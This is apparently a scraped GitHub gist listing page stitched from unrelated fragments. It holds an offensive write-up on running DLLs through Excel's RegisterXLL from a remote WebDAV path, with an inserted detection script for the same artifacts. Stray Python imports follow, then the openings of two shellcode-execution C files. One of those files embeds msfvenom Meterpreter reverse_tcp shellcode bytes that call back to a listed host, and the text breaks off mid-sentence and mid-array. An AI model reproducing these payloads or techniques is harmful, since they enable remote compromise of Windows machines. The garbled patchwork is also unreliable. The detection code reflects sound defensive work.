@an0x03e8
an0x03e8 / ExcelXLL.md
Created April 7, 2025 10:03 — forked from projectboot/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, note that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV; such files are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.
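Detection logic for the two artifacts described above, as an added example that is not part of the original gist: it flags Excel image loads from a remote UNC path or of an .xll file, and library files created in the WebDAV cache directory. The events are constructed samples using Sysmon field names (event ID 7 image load, event ID 11 file create); the host name, file names and finding labels are assumptions.

```python
import ntpath

# WebDAV cache directory named on this page.
DAV_CACHE = r"C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV"
LIBRARY_EXTS = {".dll", ".xll"}
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
SVCHOST = r"C:\Windows\System32\svchost.exe"

# Constructed sample events (not real telemetry); names are hypothetical.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": EXCEL, "ImageLoaded": r"\\dav.example.test\share\addin.dll"},
    {"EventID": 11, "Image": SVCHOST, "TargetFilename": DAV_CACHE + r"\0001\addin.dll"},
    {"EventID": 7, "Image": EXCEL, "ImageLoaded": r"C:\Users\alice\AddIns\report.xll"},
    {"EventID": 7, "Image": EXCEL, "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"EventID": 7, "Image": EXCEL, "ImageLoaded": r"\\?\C:\Windows\System32\ole32.dll"},
    {"EventID": 11, "Image": SVCHOST, "TargetFilename": DAV_CACHE + r"\0002\notes.txt"},
]

def is_remote_unc(path):
    # True for server/share UNC paths; local device prefixes (\\?\, \\.\) are excluded.
    return path.startswith("\\\\") and not path.startswith(("\\\\?\\", "\\\\.\\"))

def classify(event):
    # Return a finding label for one event, or None when nothing matches.
    eid = event.get("EventID")
    if eid == 7 and ntpath.basename(event.get("Image", "")).lower() == "excel.exe":
        loaded = event.get("ImageLoaded", "")
        if is_remote_unc(loaded):
            return "excel-remote-image-load"
        if ntpath.splitext(loaded)[1].lower() == ".xll":
            return "excel-xll-load"
    elif eid == 11:
        target = event.get("TargetFilename", "")
        in_cache = target.lower().startswith(DAV_CACHE.lower() + "\\")
        if in_cache and ntpath.splitext(target)[1].lower() in LIBRARY_EXTS:
            return "webdav-cached-library"
    return None

def triage(events):
    # Pair each matching event's index with its finding label.
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]

if __name__ == "__main__":
    for index, finding in triage(SAMPLE_EVENTS):
        print(index, finding)
```

Correlating a `webdav-cached-library` finding with an Excel image load on the same host shortly afterwards is a stronger signal than either finding alone.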

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file; however, there is a security warning. @rxwx has more notes on this here inc

import argparse
import ipaddress
from os import path
from time import sleep
from shlex import split
from scapy.all import sniff
from threading import Thread
from subprocess import Popen, PIPE
valid_ranges = []
from scapy.all import *
import unicodedata
import sys, getopt
import time, datetime
import argparse
import socket
import fcntl
import struct
import threading
@an0x03e8
an0x03e8 / shellcode_exec_workerfactory.c
Created May 20, 2023 09:53 — forked from RistBS/shellcode_exec_workerfactory.c
Just another shellcode execution technique :)
#include <Windows.h>
#include <stdio.h>
#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
typedef struct _UNICODE_STRING {
@an0x03e8
an0x03e8 / RtlRunOnceExecuteOnceShellcodeExec.c
Created April 7, 2023 11:29 — forked from paranoidninja/RtlRunOnceExecuteOnceShellcodeExec.c
Shellcode execution via RtlRunOnceExecuteOnce NtAPI
#include <windows.h>
#include <stdio.h>
extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);
// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"